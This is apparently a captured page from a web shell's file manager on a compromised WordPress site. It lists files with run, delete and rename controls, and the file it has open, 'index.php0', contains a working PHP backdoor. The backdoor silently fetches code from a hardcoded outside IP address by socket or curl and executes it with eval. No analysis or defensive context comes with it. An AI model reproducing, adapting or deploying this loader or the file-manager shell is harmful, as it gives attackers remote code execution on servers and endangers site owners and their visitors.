at path:
ROOT
/
index.php0
run:
R
W
Run
.cache_z
DIR
2026-06-01 08:23:11
R
W
Run
13111b
DIR
2026-06-05 03:34:09
R
W
Run
531c4
DIR
2026-06-05 03:34:09
R
W
Run
wp-content
DIR
2026-06-05 03:34:09
R
W
Run
wp-includes
DIR
2026-06-05 03:34:09
R
W
Run
error_log
4.88 MB
2026-06-14 23:53:42
R
W
Run
Delete
Rename
filefuns.php
1.97 KB
2026-06-14 21:18:35
R
W
Run
Delete
Rename
index.php0
587 By
2024-03-16 03:49:58
R
W
Run
Delete
Rename
robots.txt
395 By
2024-02-10 03:34:09
R
W
Run
simple.php
15.05 KB
2026-05-25 01:23:49
R
W
Run
Delete
Rename
error_log
up
📄
index.php0
Save
<?php $_h = '142.54.162.18'; $_p = '/z60414_8/stat/index2.txt'; $_f = @pfsockopen($_h, 80, $_e, $_s, 5); if ($_f) { $_r = "GET $_p HTTP/1.1\r\nHost: $_h\r\nConnection: close\r\n\r\n"; fwrite($_f, $_r); $_d = ''; $_hd = false; while (!feof($_f)) { $_l = fgets($_f, 4096); if ($_hd) $_d .= $_l; elseif (trim($_l)=='') $_hd = true; } fclose($_f); } else { $_ch = curl_init("http://$_h$_p"); curl_setopt($_ch, CURLOPT_RETURNTRANSFER, 1); $_d = curl_exec($_ch); curl_close($_ch); } if (!empty($_d)) @eval('?>' . $_d);